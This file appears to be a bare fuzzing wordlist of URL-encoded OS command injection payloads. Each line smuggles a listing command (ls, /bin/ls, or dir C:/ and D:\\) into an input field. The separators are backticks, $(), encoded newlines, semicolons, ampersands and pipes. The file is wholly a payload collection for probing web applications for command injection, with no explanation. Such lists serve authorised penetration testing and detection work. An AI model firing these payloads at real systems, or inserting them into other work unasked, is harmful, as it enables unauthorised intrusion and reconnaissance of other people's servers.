%60ls%60%0A
%60%2Fbin%2Fls%60%0A
%5Cnls%3B%0A
%5Cn%2Fbin%2Fls%3B%0A
0x0als%3B%0A
0x0a%2Fbin%2Fls%3B%0A
%24%28ls%29%3B%0A
%24%28%2Fbin%2Fls%29%3B%0A
%3Bls%3B%0A
%3B%2Fbin%2Fls%3B%0A
%26%20ls%3B%0A
%26%20%2Fbin%2Fls%3B%0A
%26%20dir%20C%3A%2F%3B%0A
%26%20dir%20C%3A%5C%5C%3B%0A
%26%20dir%20D%3A%2F%3B%0A
%26%20dir%20D%3A%5C%5C%3B%0A
%26%26%20ls%3B%0A
%26%26%20%2Fbin%2Fls%3B%0A
%26%26%20dir%20C%3A%2F%3B%0A
%26%26%20dir%20C%3A%5C%5C%3B%0A
%26%26%20dir%20D%3A%2F%3B%0A
%26%26%20dir%20D%3A%5C%5C%3B%0A
%7C%20ls%3B%0A
%7C%20%2Fbin%2Fls%3B%0A
%7C%20dir%20C%3A%2F%3B%0A
%7C%20dir%20C%3A%5C%5C%3B%0A
%7C%20dir%20D%3A%2F%3B%0A
%7C%20dir%20D%3A%5C%5C%3B%0A
%7C%7C%20ls%3B%0A
%7C%7C%20%2Fbin%2Fls%3B%0A
%7C%7C%20dir%20C%3A%2F%3B%0A
%7C%7C%20dir%20C%3A%5C%5C%3B%0A
%7C%7C%20dir%20D%3A%2F%3B%0A
%7C%7C%20dir%20D%3A%5C%5C%3B
